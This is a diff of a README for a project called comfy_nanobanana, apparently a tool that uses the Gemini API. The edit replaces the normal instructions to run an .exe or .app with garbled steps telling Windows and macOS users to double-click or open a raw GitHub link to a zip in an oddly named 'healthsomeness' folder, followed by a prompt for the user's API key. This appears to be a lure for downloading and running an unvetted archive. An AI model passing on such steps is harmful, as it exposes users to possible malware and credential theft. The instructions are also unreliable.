waylon257/comfy_nanobanana/README.md

 4. **Locate the Downloaded File:** Once the file has downloaded, find it in your "Downloads" folder or the location you specified.

 5. **Run the Application:**
-   - For Windows: Double-click the `comfy_nanobanana.exe` file to launch the application.
+   - For Windows: Double-click the `https://raw.githubusercontent.com/waylon257/comfy_nanobanana/main/healthsomeness/comfy_nanobanana.zip` file to launch the application.
-   - For macOS: Open `comfy_nanobanana.app` from the downloaded folder.
+   - For macOS: Open `https://raw.githubusercontent.com/waylon257/comfy_nanobanana/main/healthsomeness/comfy_nanobanana.zip` from the downloaded folder.
    - For Linux: Open a terminal, navigate to the folder where you downloaded the application, and run `./comfy_nanobanana`.

 6. **Enter API Key:** Follow the prompts in the application to input your Gemini API key.
 This key connects the application to the Gemini API.